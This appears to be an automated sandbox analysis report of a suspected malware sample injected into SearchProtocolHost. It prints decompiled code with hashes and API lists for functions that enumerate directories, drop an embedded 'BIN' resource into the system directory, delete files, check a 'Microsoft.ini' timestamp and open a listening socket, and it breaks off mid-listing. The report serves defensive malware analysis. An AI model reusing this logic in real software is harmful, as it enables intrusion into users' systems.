                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 02FAAA40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 143fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E02FAAA40(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi) {
				signed int _v12;
				short _v536;
				char _v1056;
				struct _WIN32_FIND_DATAW _v1648;
				signed int _v1649;
				intOrPtr _v1656;
				void* __esi;
				signed int _t32;
				signed int _t36;
				signed int _t37;
				WCHAR* _t38;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				signed int _t50;
				signed int _t51;
				WCHAR* _t55;
				void* _t62;
				intOrPtr* _t64;
				char* _t67;
				char* _t70;
				void* _t74;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				intOrPtr* _t80;
				void* _t81;
				signed int _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;

				_t32 =  *0x2fcf008; // 0x93ad1eea
				_v12 = _t32 ^ _t82;
				_v1656 = __edx;
				_t80 = __ecx;
				E02FB3440(__ecx,  &_v536, 0, 0x208);
				_t64 = _t80;
				_t84 = _t83 + 0xc;
				_t74 = _t64 + 2;
				do {
					_t36 =  *_t64;
					_t64 = _t64 + 2;
				} while (_t36 != 0);
				_t81 = wsprintfW;
				_push(_t80);
				_t37 = _t36 & 0xffffff00 |  *((short*)(_t80 + (_t64 - _t74 >> 1) * 2 - 2)) == 0x0000005c;
				_v1649 = _t37;
				_t38 =  &_v536;
				if(_t37 == 0) {
					_push(L"%ws\\*");
				} else {
					_push(L"%ws*");
				}
				wsprintfW(_t38, ??);
				_t85 = _t84 + 0xc;
				_t62 = FindFirstFileW( &_v536,  &_v1648);
				if(_t62 != 0xffffffff) {
					do {
						_t67 = ".";
						_t43 =  &(_v1648.cFileName);
						while(1) {
							_t75 =  *_t43;
							__eflags = _t75 -  *_t67;
							if(_t75 !=  *_t67) {
								break;
							}
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
								_t44 = 0;
							} else {
								_t78 =  *((intOrPtr*)(_t43 + 2));
								_t17 =  &(_t67[2]); // 0x2e0000
								__eflags = _t78 -  *_t17;
								if(_t78 !=  *_t17) {
									break;
								} else {
									_t43 = _t43 + 4;
									_t67 =  &(_t67[4]);
									__eflags = _t78;
									if(_t78 != 0) {
										continue;
									} else {
										goto L12;
									}
								}
							}
							L14:
							__eflags = _t44;
							if(_t44 != 0) {
								_t70 = L"..";
								_t50 =  &(_v1648.cFileName);
								while(1) {
									_t76 =  *_t50;
									__eflags = _t76 -  *_t70;
									if(_t76 !=  *_t70) {
										break;
									}
									__eflags = _t76;
									if(_t76 == 0) {
										L20:
										_t51 = 0;
									} else {
										_t77 =  *((intOrPtr*)(_t50 + 2));
										_t20 =  &(_t70[2]); // 0x2e
										__eflags = _t77 -  *_t20;
										if(_t77 !=  *_t20) {
											break;
										} else {
											_t50 = _t50 + 4;
											_t70 =  &(_t70[4]);
											__eflags = _t77;
											if(_t77 != 0) {
												continue;
											} else {
												goto L20;
											}
										}
									}
									L22:
									__eflags = _t51;
									if(_t51 != 0) {
										__eflags = _v1648.dwFileAttributes & 0x00000010;
										if((_v1648.dwFileAttributes & 0x00000010) != 0) {
											E02FB3440(_t80,  &_v1056, 0, 0x208);
											_t86 = _t85 + 0xc;
											__eflags = _v1649;
											_push( &(_v1648.cFileName));
											_push(_t80);
											_t55 =  &_v1056;
											if(__eflags == 0) {
												_push(L"%ws\\%ws");
											} else {
												_push(L"%ws%ws");
											}
											wsprintfW(_t55, ??);
											E02FAA970(_t62, _t80, __eflags, _v1656,  &_v1056);
											_t85 = _t86 + 0x18;
										}
									}
									goto L28;
								}
								asm("sbb eax, eax");
								_t51 = _t50 | 0x00000001;
								__eflags = _t51;
								goto L22;
							}
							goto L28;
						}
						asm("sbb eax, eax");
						_t44 = _t43 | 0x00000001;
						__eflags = _t44;
						goto L14;
						L28:
						_t46 = FindNextFileW(_t62,  &_v1648);
						__eflags = _t46;
					} while (_t46 != 0);
					FindClose(_t62);
					__eflags = _v12 ^ _t82;
					return E02FB0A5D(_v12 ^ _t82, _t81);
				} else {
					return E02FB0A5D(_v12 ^ _t82, _t81);
				}
			}




































                                                0x02faaa49
                                                0x02faaa50
                                                0x02faaa61
                                                0x02faaa6a
                                                0x02faaa6c
                                                0x02faaa71
                                                0x02faaa73
                                                0x02faaa76
                                                0x02faaa80
                                                0x02faaa80
                                                0x02faaa83
                                                0x02faaa86
                                                0x02faaa8b
                                                0x02faaa95
                                                0x02faaa9c
                                                0x02faaa9f
                                                0x02faaaa7
                                                0x02faaaad
                                                0x02faaab6
                                                0x02faaaaf
                                                0x02faaaaf
                                                0x02faaaaf
                                                0x02faaabc
                                                0x02faaabe
                                                0x02faaad5
                                                0x02faaada
                                                0x02faaaf0
                                                0x02faaaf0
                                                0x02faaaf5
                                                0x02faab00
                                                0x02faab00
                                                0x02faab03
                                                0x02faab06
                                                0x00000000
                                                0x00000000
                                                0x02faab08
                                                0x02faab0b
                                                0x02faab22
                                                0x02faab22
                                                0x02faab0d
                                                0x02faab0d
                                                0x02faab11
                                                0x02faab11
                                                0x02faab15
                                                0x00000000
                                                0x02faab17
                                                0x02faab17
                                                0x02faab1a
                                                0x02faab1d
                                                0x02faab20
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faab20
                                                0x02faab15
                                                0x02faab2b
                                                0x02faab2b
                                                0x02faab2d
                                                0x02faab33
                                                0x02faab38
                                                0x02faab40
                                                0x02faab40
                                                0x02faab43
                                                0x02faab46
                                                0x00000000
                                                0x00000000
                                                0x02faab48
                                                0x02faab4b
                                                0x02faab62
                                                0x02faab62
                                                0x02faab4d
                                                0x02faab4d
                                                0x02faab51
                                                0x02faab51
                                                0x02faab55
                                                0x00000000
                                                0x02faab57
                                                0x02faab57
                                                0x02faab5a
                                                0x02faab5d
                                                0x02faab60
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faab60
                                                0x02faab55
                                                0x02faab6b
                                                0x02faab6b
                                                0x02faab6d
                                                0x02faab6f
                                                0x02faab76
                                                0x02faab86
                                                0x02faab8b
                                                0x02faab94
                                                0x02faab9b
                                                0x02faab9c
                                                0x02faab9d
                                                0x02faaba3
                                                0x02faabac
                                                0x02faaba5
                                                0x02faaba5
                                                0x02faaba5
                                                0x02faabb2
                                                0x02faabc4
                                                0x02faabc9
                                                0x02faabc9
                                                0x02faab76
                                                0x00000000
                                                0x02faab6d
                                                0x02faab66
                                                0x02faab68
                                                0x02faab68
                                                0x00000000
                                                0x02faab68
                                                0x00000000
                                                0x02faab2d
                                                0x02faab26
                                                0x02faab28
                                                0x02faab28
                                                0x00000000
                                                0x02faabcc
                                                0x02faabd4
                                                0x02faabda
                                                0x02faabda
                                                0x02faabe3
                                                0x02faabf0
                                                0x02faabfb
                                                0x02faaadc
                                                0x02faaaee
                                                0x02faaaee

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileFindFirstwsprintf
                                                • String ID: %ws%ws$%ws*$%ws\%ws$%ws\*
                                                • API String ID: 2655791690-2373285283
                                                • Opcode ID: 0b202757d17b06714c0869c6f77e98634fe18a42ca70e2a92773dcd1b5713fb0
                                                • Instruction ID: 9366a5e6b87a80fba6309ad73b330e795c9d79159a71d2f2570e8783a9c00c6d
                                                • Opcode Fuzzy Hash: 0b202757d17b06714c0869c6f77e98634fe18a42ca70e2a92773dcd1b5713fb0
                                                • Instruction Fuzzy Hash: 54413BB1E402099ADB20EB20CD51FFAB3BBEF556D4F4445EADA0ED7140E7329A5CCA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA9D90 Relevance: 15.3, APIs: 10, Instructions: 287COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E02FA9D90(void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed char _v28;
				struct _CRITICAL_SECTION _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _v68;
				struct _CRITICAL_SECTION _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed char _v108;
				struct _CRITICAL_SECTION _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				signed char _v148;
				struct _CRITICAL_SECTION _v172;
				char _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				signed char _v188;
				struct _CRITICAL_SECTION _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t107;
				intOrPtr _t118;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t132;
				signed char _t135;
				signed char _t137;
				signed char _t139;
				signed char _t141;
				signed char _t143;
				intOrPtr _t159;
				void* _t165;
				signed char _t167;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t198;
				void* _t199;
				signed int _t200;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				void* _t213;
				void* _t214;
				void* _t216;

				_t216 = __eflags;
				_push(0xffffffff);
				_push(E02FC4781);
				_push( *[fs:0x0]);
				_t214 = _t213 - 0xc8;
				_push(_t165);
				_push(_t199);
				_t107 =  *0x2fcf008; // 0x93ad1eea
				_push(_t107 ^ _t212);
				 *[fs:0x0] =  &_v16;
				_v216 = 0x2fccbac;
				InitializeCriticalSection( &_v212);
				_v188 = 0;
				_v184 = 0;
				_v180 = 0;
				_v8 = 0;
				_v56 = 0x2fccbac;
				InitializeCriticalSection( &_v52);
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v176 = 0x2fccbac;
				InitializeCriticalSection( &_v172);
				_v148 = 0;
				_v144 = 0;
				_v140 = 0;
				_v96 = 0x2fccbac;
				InitializeCriticalSection( &_v92);
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v136 = 0x2fccbac;
				InitializeCriticalSection( &_v132);
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v8 = 4;
				E02FA9B40( &_v136,  &_v96);
				E02FA9740(_t165,  &_v176,  &_v56, _t199);
				E02FA98C0(_t165,  &_v216, _t199, _t216);
				_t118 = _v24;
				_t200 = 0;
				if(_t118 != 0) {
					_t189 = _v64;
					asm("o16 nop [eax+eax]");
					do {
						_t167 = 0;
						_t211 = 0;
						if(_t189 == 0) {
							L11:
							_t190 = 0;
							__eflags = _t200 - _t118;
							if(__eflags < 0) {
								_t190 =  *((intOrPtr*)(_v28 + _t200 * 4));
							}
							E02FA9A20(_t167, _t190, _t200, _t211, __eflags);
							_t189 = _v64;
						} else {
							while(1) {
								_t198 = 0;
								if(_t200 < _t118) {
									_t198 =  *((intOrPtr*)(_v28 + _t200 * 4));
								}
								_t159 = 0;
								if(_t211 < _t189) {
									_t159 =  *((intOrPtr*)(_v68 + _t211 * 4));
								}
								E02FB7612(_t200, _t211, _t159, _t198);
								_t189 = _v64;
								_t214 = _t214 + 8;
								_t167 =  ==  ? 1 : _t167 & 0x000000ff;
								_t211 = _t211 + 1;
								if(_t211 >= _t189) {
									break;
								}
								_t118 = _v24;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								_t118 = _v24;
								goto L11;
							}
						}
						_t118 = _v24;
						_t200 = _t200 + 1;
						__eflags = _t200 - _t118;
					} while (_t200 < _t118);
				}
				E02FA9CC0( &_v176, 0x2fd5ba8);
				E02FA9CC0( &_v136, 0x2fd5ba8);
				E02FA9CC0( &_v56, 0x2fd5bd0);
				E02FA9CC0( &_v216, 0x2fd5bd0);
				E02FA9CC0( &_v96, 0x2fd5bd0);
				_t124 = _v184;
				_t204 = 0;
				__eflags = _t124;
				if(_t124 != 0) {
					do {
						_t188 = 0;
						__eflags = _t204 - _t124;
						if(_t204 < _t124) {
							_t188 =  *((intOrPtr*)(_v188 + _t204 * 4));
						}
						_push(0x100);
						E02FB0AA1(_t188);
						_t124 = _v184;
						_t204 = _t204 + 1;
						_t214 = _t214 + 8;
						__eflags = _t204 - _t124;
					} while (_t204 < _t124);
				}
				_v184 = 0;
				E02FA6EF0( &_v216);
				_t126 = _v24;
				_t205 = 0;
				__eflags = _t126;
				if(_t126 != 0) {
					do {
						_t187 = 0;
						__eflags = _t205 - _t126;
						if(_t205 < _t126) {
							_t187 =  *((intOrPtr*)(_v28 + _t205 * 4));
						}
						_push(0x100);
						E02FB0AA1(_t187);
						_t126 = _v24;
						_t205 = _t205 + 1;
						_t214 = _t214 + 8;
						__eflags = _t205 - _t126;
					} while (_t205 < _t126);
				}
				_v24 = 0;
				E02FA6EF0( &_v56);
				_t128 = _v144;
				_t206 = 0;
				__eflags = _t128;
				if(_t128 != 0) {
					do {
						_t186 = 0;
						__eflags = _t206 - _t128;
						if(_t206 < _t128) {
							_t186 =  *((intOrPtr*)(_v148 + _t206 * 4));
						}
						_push(0x100);
						E02FB0AA1(_t186);
						_t128 = _v144;
						_t206 = _t206 + 1;
						_t214 = _t214 + 8;
						__eflags = _t206 - _t128;
					} while (_t206 < _t128);
				}
				_v144 = 0;
				E02FA6EF0( &_v176);
				_t130 = _v64;
				_t207 = 0;
				__eflags = _t130;
				if(_t130 != 0) {
					do {
						_t185 = 0;
						__eflags = _t207 - _t130;
						if(_t207 < _t130) {
							_t185 =  *((intOrPtr*)(_v68 + _t207 * 4));
						}
						_push(0x100);
						E02FB0AA1(_t185);
						_t130 = _v64;
						_t207 = _t207 + 1;
						_t214 = _t214 + 8;
						__eflags = _t207 - _t130;
					} while (_t207 < _t130);
				}
				_v64 = 0;
				E02FA6EF0( &_v96);
				_t132 = _v104;
				_t208 = 0;
				__eflags = _t132;
				if(_t132 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t184 = 0;
						__eflags = _t208 - _t132;
						if(_t208 < _t132) {
							_t184 =  *((intOrPtr*)(_v108 + _t208 * 4));
						}
						_push(0x100);
						E02FB0AA1(_t184);
						_t132 = _v104;
						_t208 = _t208 + 1;
						_t214 = _t214 + 8;
						__eflags = _t208 - _t132;
					} while (_t208 < _t132);
				}
				_v104 = 0;
				E02FA6EF0( &_v136);
				_v136 = 0x2fccbac;
				DeleteCriticalSection( &_v132);
				_t135 = _v108;
				__eflags = _t135;
				if(_t135 != 0) {
					L02FB5A36(_t135);
					_t214 = _t214 + 4;
				}
				_v96 = 0x2fccbac;
				DeleteCriticalSection( &_v92);
				_t137 = _v68;
				__eflags = _t137;
				if(_t137 != 0) {
					L02FB5A36(_t137);
					_t214 = _t214 + 4;
				}
				_v176 = 0x2fccbac;
				DeleteCriticalSection( &_v172);
				_t139 = _v148;
				__eflags = _t139;
				if(_t139 != 0) {
					L02FB5A36(_t139);
					_t214 = _t214 + 4;
				}
				_v56 = 0x2fccbac;
				DeleteCriticalSection( &_v52);
				_t141 = _v28;
				__eflags = _t141;
				if(_t141 != 0) {
					L02FB5A36(_t141);
					_t214 = _t214 + 4;
				}
				_v216 = 0x2fccbac;
				DeleteCriticalSection( &_v212);
				_t143 = _v188;
				__eflags = _t143;
				if(_t143 != 0) {
					_t143 = L02FB5A36(_t143);
				}
				 *[fs:0x0] = _v16;
				return _t143;
			}




































































                                                0x02fa9d90
                                                0x02fa9d93
                                                0x02fa9d95
                                                0x02fa9da0
                                                0x02fa9da1
                                                0x02fa9da7
                                                0x02fa9da9
                                                0x02fa9daa
                                                0x02fa9db1
                                                0x02fa9db5
                                                0x02fa9dc8
                                                0x02fa9dd2
                                                0x02fa9dd4
                                                0x02fa9dde
                                                0x02fa9de8
                                                0x02fa9df5
                                                0x02fa9dfd
                                                0x02fa9e04
                                                0x02fa9e06
                                                0x02fa9e0d
                                                0x02fa9e14
                                                0x02fa9e21
                                                0x02fa9e2c
                                                0x02fa9e2e
                                                0x02fa9e38
                                                0x02fa9e42
                                                0x02fa9e4f
                                                0x02fa9e57
                                                0x02fa9e59
                                                0x02fa9e60
                                                0x02fa9e67
                                                0x02fa9e71
                                                0x02fa9e7c
                                                0x02fa9e7e
                                                0x02fa9e85
                                                0x02fa9e8c
                                                0x02fa9e96
                                                0x02fa9ea0
                                                0x02fa9eae
                                                0x02fa9eb9
                                                0x02fa9ebe
                                                0x02fa9ec1
                                                0x02fa9ec5
                                                0x02fa9ec7
                                                0x02fa9eca
                                                0x02fa9ed0
                                                0x02fa9ed0
                                                0x02fa9ed2
                                                0x02fa9ed6
                                                0x02fa9f1b
                                                0x02fa9f1b
                                                0x02fa9f1d
                                                0x02fa9f1f
                                                0x02fa9f24
                                                0x02fa9f24
                                                0x02fa9f27
                                                0x02fa9f2c
                                                0x02fa9ed8
                                                0x02fa9ed8
                                                0x02fa9ed8
                                                0x02fa9edc
                                                0x02fa9ee1
                                                0x02fa9ee1
                                                0x02fa9ee4
                                                0x02fa9ee8
                                                0x02fa9eed
                                                0x02fa9eed
                                                0x02fa9ef2
                                                0x02fa9ef7
                                                0x02fa9efa
                                                0x02fa9f07
                                                0x02fa9f0a
                                                0x02fa9f0d
                                                0x00000000
                                                0x00000000
                                                0x02fa9f0f
                                                0x02fa9f0f
                                                0x02fa9f14
                                                0x02fa9f16
                                                0x02fa9f18
                                                0x00000000
                                                0x02fa9f18
                                                0x02fa9f16
                                                0x02fa9f2f
                                                0x02fa9f32
                                                0x02fa9f33
                                                0x02fa9f33
                                                0x02fa9ed0
                                                0x02fa9f42
                                                0x02fa9f52
                                                0x02fa9f5f
                                                0x02fa9f6f
                                                0x02fa9f7c
                                                0x02fa9f81
                                                0x02fa9f87
                                                0x02fa9f89
                                                0x02fa9f8b
                                                0x02fa9f90
                                                0x02fa9f90
                                                0x02fa9f92
                                                0x02fa9f94
                                                0x02fa9f9c
                                                0x02fa9f9c
                                                0x02fa9f9f
                                                0x02fa9fa5
                                                0x02fa9faa
                                                0x02fa9fb0
                                                0x02fa9fb1
                                                0x02fa9fb4
                                                0x02fa9fb4
                                                0x02fa9f90
                                                0x02fa9fbe
                                                0x02fa9fc8
                                                0x02fa9fcd
                                                0x02fa9fd0
                                                0x02fa9fd2
                                                0x02fa9fd4
                                                0x02fa9fd6
                                                0x02fa9fd6
                                                0x02fa9fd8
                                                0x02fa9fda
                                                0x02fa9fdf
                                                0x02fa9fdf
                                                0x02fa9fe2
                                                0x02fa9fe8
                                                0x02fa9fed
                                                0x02fa9ff0
                                                0x02fa9ff1
                                                0x02fa9ff4
                                                0x02fa9ff4
                                                0x02fa9fd6
                                                0x02fa9ffb
                                                0x02faa002
                                                0x02faa007
                                                0x02faa00d
                                                0x02faa00f
                                                0x02faa011
                                                0x02faa013
                                                0x02faa013
                                                0x02faa015
                                                0x02faa017
                                                0x02faa01f
                                                0x02faa01f
                                                0x02faa022
                                                0x02faa028
                                                0x02faa02d
                                                0x02faa033
                                                0x02faa034
                                                0x02faa037
                                                0x02faa037
                                                0x02faa013
                                                0x02faa041
                                                0x02faa04b
                                                0x02faa050
                                                0x02faa053
                                                0x02faa055
                                                0x02faa057
                                                0x02faa060
                                                0x02faa060
                                                0x02faa062
                                                0x02faa064
                                                0x02faa069
                                                0x02faa069
                                                0x02faa06c
                                                0x02faa072
                                                0x02faa077
                                                0x02faa07a
                                                0x02faa07b
                                                0x02faa07e
                                                0x02faa07e
                                                0x02faa060
                                                0x02faa085
                                                0x02faa08c
                                                0x02faa091
                                                0x02faa094
                                                0x02faa096
                                                0x02faa098
                                                0x02faa09a
                                                0x02faa0a0
                                                0x02faa0a0
                                                0x02faa0a2
                                                0x02faa0a4
                                                0x02faa0a9
                                                0x02faa0a9
                                                0x02faa0ac
                                                0x02faa0b2
                                                0x02faa0b7
                                                0x02faa0ba
                                                0x02faa0bb
                                                0x02faa0be
                                                0x02faa0be
                                                0x02faa0a0
                                                0x02faa0c8
                                                0x02faa0cf
                                                0x02faa0de
                                                0x02faa0e8
                                                0x02faa0ea
                                                0x02faa0ed
                                                0x02faa0ef
                                                0x02faa0f2
                                                0x02faa0f7
                                                0x02faa0f7
                                                0x02faa0fd
                                                0x02faa105
                                                0x02faa107
                                                0x02faa10a
                                                0x02faa10c
                                                0x02faa10f
                                                0x02faa114
                                                0x02faa114
                                                0x02faa11d
                                                0x02faa128
                                                0x02faa12a
                                                0x02faa130
                                                0x02faa132
                                                0x02faa135
                                                0x02faa13a
                                                0x02faa13a
                                                0x02faa140
                                                0x02faa148
                                                0x02faa14a
                                                0x02faa14d
                                                0x02faa14f
                                                0x02faa152
                                                0x02faa157
                                                0x02faa157
                                                0x02faa160
                                                0x02faa16b
                                                0x02faa16d
                                                0x02faa173
                                                0x02faa175
                                                0x02faa178
                                                0x02faa17d
                                                0x02faa183
                                                0x02faa191

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(73B76490,93AD1EEA), ref: 02FA9DD2
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA9E04
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA9E2C
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA9E57
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA9E7C
                                                  • Part of subcall function 02FA9B40: new.LIBCMT ref: 02FA9BAB
                                                  • Part of subcall function 02FA9740: GetSystemDirectoryA.KERNEL32 ref: 02FA97A9
                                                  • Part of subcall function 02FA9740: DeleteFileA.KERNEL32(?), ref: 02FA97EF
                                                  • Part of subcall function 02FA9740: DeleteFileA.KERNEL32(?), ref: 02FA97F8
                                                  • Part of subcall function 02FA9740: FindResourceA.KERNEL32(00000000,00000065,BIN), ref: 02FA9803
                                                  • Part of subcall function 02FA9740: SizeofResource.KERNEL32(00000000,00000000,77109EB0), ref: 02FA9817
                                                  • Part of subcall function 02FA9740: LoadResource.KERNEL32(00000000,00000000), ref: 02FA9822
                                                  • Part of subcall function 02FA9740: LockResource.KERNEL32(00000000), ref: 02FA9829
                                                  • Part of subcall function 02FA9740: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 02FA986B
                                                  • Part of subcall function 02FA98C0: new.LIBCMT ref: 02FA99A6
                                                • DeleteCriticalSection.KERNEL32(?), ref: 02FAA0E8
                                                • DeleteCriticalSection.KERNEL32(?), ref: 02FAA105
                                                • DeleteCriticalSection.KERNEL32(?), ref: 02FAA128
                                                • DeleteCriticalSection.KERNEL32(?), ref: 02FAA148
                                                • DeleteCriticalSection.KERNEL32(73B76490), ref: 02FAA16B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Delete$Initialize$Resource$File$DirectoryFindLoadLockObjectSingleSizeofSystemWait
                                                • String ID:
                                                • API String ID: 2718288186-0
                                                • Opcode ID: 34bb44b9b572548942e72b719623cdba26360db0ee63af17c37cc1b29204e891
                                                • Instruction ID: f4c421eb1bc936f0c6b3cbbd88d5231320e93aea8f27e6700caffc29f5081db6
                                                • Opcode Fuzzy Hash: 34bb44b9b572548942e72b719623cdba26360db0ee63af17c37cc1b29204e891
                                                • Instruction Fuzzy Hash: EAB130B0E002299BDF14DFA4CD90BDEB7B9AF04784F5144A9DA45B7240EB709E49CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA8EC0 Relevance: 7.6, APIs: 5, Instructions: 56networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02FA8ED9
                                                • htons.WS2_32(?), ref: 02FA8F14
                                                • htonl.WS2_32(00000000), ref: 02FA8F29
                                                • bind.WS2_32(?,?,00000010), ref: 02FA8F3E
                                                • listen.WS2_32(?,00000005), ref: 02FA8F50
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: bindhtonlhtonslistensocket
                                                • String ID:
                                                • API String ID: 3517227109-0
                                                • Opcode ID: fe1db960b4bd993aad4321326016b4631e1a557472fc7ff775ef412b562725e5
                                                • Instruction ID: c64601ffe68bd6a86859d47e9708af2cf338a6f17a1ba9b8e7b3e7df87238fe2
                                                • Opcode Fuzzy Hash: fe1db960b4bd993aad4321326016b4631e1a557472fc7ff775ef412b562725e5
                                                • Instruction Fuzzy Hash: E4118F70E40309EBDB10DFB4D909BEFB7F4EF05750F60466AE905AB280EB719A109B84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAA3B0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 190filetimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E02FAA3B0(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
				signed int _v8;
				short _v532;
				short _v1052;
				struct _FILETIME _v1060;
				struct _FILETIME _v1068;
				struct _FILETIME _v1076;
				struct _FILETIME _v1084;
				struct _FILETIME _v1092;
				struct _FILETIME _v1100;
				void* __esi;
				signed int _t38;
				void* _t50;
				int _t61;
				void* _t69;
				void* _t72;
				signed int _t83;
				signed int _t94;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				signed int _t103;

				_t95 = __edi;
				_t94 = __edx;
				_t38 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t38 ^ _t103;
				_t99 = __ecx;
				E02FB3440(__edi,  &_v532, 0, 0x208);
				_t100 = wsprintfW;
				wsprintfW( &_v532, L"%ws\\%ws", _t99, L"Microsoft.ini");
				E02FB3440(_t95,  &_v1052, 0, 0x208);
				wsprintfW( &_v1052, L"%ws.log",  &_v532);
				_t50 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0, 0);
				if(_t50 == 0xffffffff) {
					L14:
					__eflags = _v8 ^ _t103;
					return E02FB0A5D(_v8 ^ _t103, _t100);
				} else {
					_t101 = CloseHandle;
					CloseHandle(_t50);
					_v1092.dwLowDateTime = 0;
					_v1092.dwHighDateTime = 0;
					_v1100.dwLowDateTime = 0;
					_v1100.dwHighDateTime = 0;
					_v1060.dwLowDateTime = 0;
					_v1060.dwHighDateTime = 0;
					_v1068.dwLowDateTime = 0;
					_v1068.dwHighDateTime = 0;
					_v1076.dwLowDateTime = 0;
					_v1076.dwHighDateTime = 0;
					_v1084.dwLowDateTime = 0;
					_v1084.dwHighDateTime = 0;
					_t96 = CreateFileW( &_v1052, 0x80000000, 1, 0, 2, 0x80, 0);
					if(_t96 == 0xffffffff) {
						L13:
						__eflags = _v8 ^ _t103;
						return E02FB0A5D(_v8 ^ _t103, _t101);
					} else {
						_t61 = GetFileTime(_t96,  &_v1092,  &_v1060,  &_v1076);
						_push(_t96);
						if(_t61 != 0) {
							CloseHandle();
							DeleteFileW( &_v1052);
							_t97 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0x80, 0);
							__eflags = _t97 - 0xffffffff;
							if(_t97 != 0xffffffff) {
								GetFileTime(_t97,  &_v1100,  &_v1068,  &_v1084);
								CloseHandle(_t97);
							}
							asm("sbb eax, [ebp-0x424]");
							_t98 = E02FC4470(_v1060.dwLowDateTime - _v1068.dwLowDateTime, _v1060.dwHighDateTime, 0x2710, 0);
							_t101 = _v1076.dwLowDateTime - _v1084.dwLowDateTime;
							_t83 = _t94;
							asm("sbb ecx, [ebp-0x434]");
							_t69 = E02FC4470(_v1076.dwLowDateTime - _v1084.dwLowDateTime, _v1076.dwHighDateTime, 0x2710, 0);
							__eflags = _t83 - _t94;
							if(__eflags < 0) {
								L9:
								_t69 = _t98;
								_t94 = _t83;
							} else {
								if(__eflags <= 0) {
									__eflags = _t98 - _t69;
									if(_t98 <= _t69) {
										goto L9;
									}
								}
							}
							_t72 = E02FC4470(E02FC4470(E02FC4470(_t69, _t94, 0x3e8, 0), _t94, 0x3c, 0), _t94, 0x3c, 0);
							__eflags = _t94;
							if(__eflags < 0) {
								goto L13;
							} else {
								if(__eflags > 0) {
									goto L14;
								} else {
									__eflags = _t72 - 0x48;
									if(_t72 > 0x48) {
										goto L14;
									} else {
										goto L13;
									}
								}
							}
						} else {
							CloseHandle();
							return E02FB0A5D(_v8 ^ _t103, CloseHandle);
						}
					}
				}
			}


























                                                0x02faa3b0
                                                0x02faa3b0
                                                0x02faa3b9
                                                0x02faa3c0
                                                0x02faa3d1
                                                0x02faa3d6
                                                0x02faa3ea
                                                0x02faa3f6
                                                0x02faa406
                                                0x02faa421
                                                0x02faa442
                                                0x02faa447
                                                0x02faa61a
                                                0x02faa621
                                                0x02faa62c
                                                0x02faa44d
                                                0x02faa44d
                                                0x02faa454
                                                0x02faa46e
                                                0x02faa479
                                                0x02faa483
                                                0x02faa48d
                                                0x02faa497
                                                0x02faa4a1
                                                0x02faa4ab
                                                0x02faa4b5
                                                0x02faa4bf
                                                0x02faa4c9
                                                0x02faa4d3
                                                0x02faa4dd
                                                0x02faa4e9
                                                0x02faa4ee
                                                0x02faa607
                                                0x02faa60f
                                                0x02faa619
                                                0x02faa4f4
                                                0x02faa50a
                                                0x02faa510
                                                0x02faa513
                                                0x02faa52a
                                                0x02faa533
